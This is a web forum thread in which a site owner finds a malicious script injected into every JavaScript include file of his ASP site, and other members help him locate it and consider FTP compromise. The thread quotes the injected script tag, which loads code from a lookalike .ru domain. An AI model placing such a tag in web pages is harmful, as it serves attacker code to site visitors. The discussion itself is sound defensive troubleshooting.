charlie

Somewhere in my code is a malware script

it basically this
remote data services data control bloodhound virus embedded in webpage : services, remote, control

i've searched high and low for the script within the code without any luck. Using firefox with combined generated source you can see it - index page shows the code at the bottom

<script src="h**p://surfthechannel-com.tribalfusion.com.rakuten-co-jp.worldwebworld.ru:8080/google.com/google.com/yieldmanager.com/girlsgogames.com/it168.com/" id="Y1oh3ud7md" type="text/javascript" defer="defer"></script>

but looking at the 2 frames individually it isnt there

i've run malware and anti virus all over it with out joy. Also full script searches for any of the text within that link - even gone through all the javascript references

any ideas??

__________________
domains for sale: Cowrie.co.uk SEDO
sites:iroses ichocolate sportsunderwear personallingerie Italy Hotels magazinediscounts

davedevelopment

Not just from that I'm afraid, the ones I've seen have usually been included by using PHPs base64_decode function, making it harder to spot/find.

__________________
Me: Blog | Company | Twitter

Coming Soon: DaveDomains | DaveCatcher | FreeToReg.co.uk

charlie

asp site so not sure it will be in the PHP?
have being using firebug to step through every parameter but not sure what exactly i'm looking for

well if you can spot it
URL is ******marineband.com
any help appreciated

__________________
domains for sale: Cowrie.co.uk SEDO
sites:iroses ichocolate sportsunderwear personallingerie Italy Hotels magazinediscounts

davedevelopment

Check the last line of all your javascript files.

e.g. httpRequest.js, line 99

__________________
Me: Blog | Company | Twitter

Coming Soon: DaveDomains | DaveCatcher | FreeToReg.co.uk

charlie

brilliance!
thanks you saved me - i owe you a beer

dont suppose you can tell me how you found that? save me the turmoil next time.

__________________
domains for sale: Cowrie.co.uk SEDO
sites:iroses ichocolate sportsunderwear personallingerie Italy Hotels magazinediscounts

charlie

in fact the script was in everyone of my js include files - thanks again for putting me on the right track

__________________
domains for sale: Cowrie.co.uk SEDO
sites:iroses ichocolate sportsunderwear personallingerie Italy Hotels magazinediscounts

davedevelopment

I just checked your JS for anything suspicious looking!

charlie

bit odd that antivirus and malware missed these
I know that they cant cover every script but the format must be similar. I've had this before.
Oddly they are very recent additions - i archived the site last week and they are not in there then. Suppose hackers work every day

__________________
domains for sale: Cowrie.co.uk SEDO
sites:iroses ichocolate sportsunderwear personallingerie Italy Hotels magazinediscounts

newguy

Are you going to make any changes to ensure that this doesn't happen again? Is everything up-to-date? It's possible that they're using some kind of automated software to exploit a weakness.

charlie

difficult to spot unless i know exactly how they got in
ftp access to files - means i can only change the password on the ftp, which will only delay them if they are that keen. Not sure what it was set to but i can only imagine thats the way they did it?

__________________
domains for sale: Cowrie.co.uk SEDO
sites:iroses ichocolate sportsunderwear personallingerie Italy Hotels magazinediscounts